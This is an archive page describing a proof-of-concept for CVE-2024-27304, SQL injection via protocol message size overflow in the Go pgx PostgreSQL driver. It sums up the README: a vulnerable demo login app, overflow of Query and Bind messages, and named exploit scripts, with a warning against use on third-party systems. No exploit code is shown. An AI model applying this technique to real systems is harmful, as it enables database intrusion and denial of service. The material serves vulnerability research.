Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-27304 PoC — pgx 安全漏洞

Source
https://github.com/roaris/CVE-2024-27304-PoC
Associated Vulnerability
Title:pgx 安全漏洞 (CVE-2024-27304)
Description:pgx是适用于 Go 的 PostgreSQL 驱动程序和工具包。 pgx存在安全漏洞,该漏洞源于通过协议消息大小溢出可以进行SQL注入。
Description
PoC of "DEF CON 32 - SQL Injection Isn't Dead Smuggling Queries at the Protocol Level - Paul Gerste"
Readme
# CVE-2024-27304-PoC

## references
- [DEF CON 32 - SQL Injection Isn't Dead Smuggling Queries at the Protocol Level - Paul Gerste](https://www.youtube.com/watch?v=Tfg1B8u1yvE)
- [pgx SQL Injection via Protocol Message Size Overflow](https://github.com/advisories/GHSA-mrww-27vc-gghv)

## webapp
A simple web application with login functionality. Only administrators can log in.

This application uses PostgreSQL and pgx v5.5.3 (vulnerable version).

The attacker attempts to log in by maliciously inserting records into the users table. However, since placeholders are used, traditional SQL injection does not work.

## exploit
PostgreSQL Message Formats: https://www.postgresql.org/docs/17/protocol-message-formats.html

The exploit depends on the message format that pgx sends to the database server when executing SQL.
By default, pgx sends a prepared statement with `P(Parse)` and then sends parameters with `B(Bind)`.

If the following configuration is set, pgx sends the interpolated query with `Q(Query)`:
```go
cfg.ConnConfig.DefaultQueryExecMode = pgx.QueryExecModeSimpleProtocol
```

You can view the actual messages using tcpdump with the `-X` option.

### scripts

- `Q_simple.py`: Causes overflow with `Q(Query)`. Assumes the attacker has complete knowledge of the query being executed (if black-box, bruteforce is required).
- `Q_nop_sled.py`: Causes overflow with `Q(Query)`. Succeeds in exploitation within 5 attempts.
- `B_simple.py`: Causes overflow with `B(Bind)`. Assumes the attacker has complete knowledge of the query being executed (in my opinion, `B(Bind)` exploitation is difficult in black-box scenarios).

### Notes
- A large amount of memory is required to successfully execute the exploit.
- This exploit sends an extremely large payload and may cause a DoS. As mentioned in the video, **do not execute this exploit against third-party systems**.
File Snapshot

 [4.0K]  /data/pocs/99100e77725b8d5a061498c244c1c177d73aeca4
├── [4.0K]  exploit
│   ├── [ 828]  B_simple.py
│   ├── [ 720]  Q_nop_sled.py
│   └── [ 797]  Q_simple.py
├── [1.8K]  README.md
└── [4.0K]  webapp
    ├── [ 465]  compose.yml
    ├── [ 133]  Dockerfile
    ├── [ 382]  go.mod
    ├── [2.4K]  go.sum
    ├── [ 283]  init.sql
    ├── [4.1K]  main.go
    └── [4.0K]  views
        ├── [  26]  home.html
        └── [ 300]  login.html

4 directories, 12 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.